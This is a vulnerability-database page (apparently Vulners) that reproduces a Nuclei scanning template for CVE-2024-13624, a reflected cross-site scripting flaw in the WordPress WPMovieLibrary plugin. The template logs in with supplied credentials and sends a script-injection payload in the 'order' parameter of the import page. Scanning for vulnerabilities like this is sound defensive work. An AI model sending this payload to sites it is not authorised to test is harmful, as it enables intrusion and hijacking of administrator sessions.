Lucene search
K

WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting

🗓️ 12 Jul 2026 03:00:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

WordPress WPMovieLibrary Plugin <= 2.1.4.8 has a high severity cross-site scripting vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13624
26 Feb 202506:25
circl
CNNVD
WordPress plugin WPMovieLibrary 安全漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-13624
26 Feb 202506:00
cve
Cvelist
CVE-2024-13624 WPMovieLibrary <= 2.1.4.8 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2025-5311
3 Oct 202520:07
euvd
NVD
CVE-2024-13624
26 Feb 202513:15
nvd
OSV
CVE-2024-13624
26 Feb 202513:15
osv
Patchstack
WordPress WPMovieLibrary plugin <= 2.1.4.8 - Reflected Cross-Site Scripting vulnerability
12 Feb 202522:08
patchstack
Positive Technologies
PT-2025-8674 · WordPress · Wpmovielibrary
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13624
28 Feb 202506:24
redhatcve
Rows per page
id: CVE-2024-13624

info:
  name: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
  impact: |
    Authenticated attackers can execute arbitrary JavaScript in an administrator's browser context via the order parameter, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update WPMovieLibrary plugin to a version newer than 2.1.4.8.
  reference:
    - https://wpscan.com/vulnerability/c19b56cc-634f-420f-b6a0-9a10ad159049
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13624
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-13624
    cwe-id: CWE-79
    epss-score: 0.00649
    epss-percentile: 0.46803
  metadata:
    verified: true
    max-request: 2
    product: wpmovielibrary
    fofa-query: body="wp-content/plugins/wpmovielibrary/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'wpmovielibrary'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=wpmovielibrary-import&order=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script><script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022061bb562eb192515eb892fbed23482934b8a9d08ca76970a029c04e63055a58f302204f3e81468a17479fa511c11c3820a61f7d12e4461839cc2e9e71cc814911a850:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.1
EPSS0.00649
SSVC
15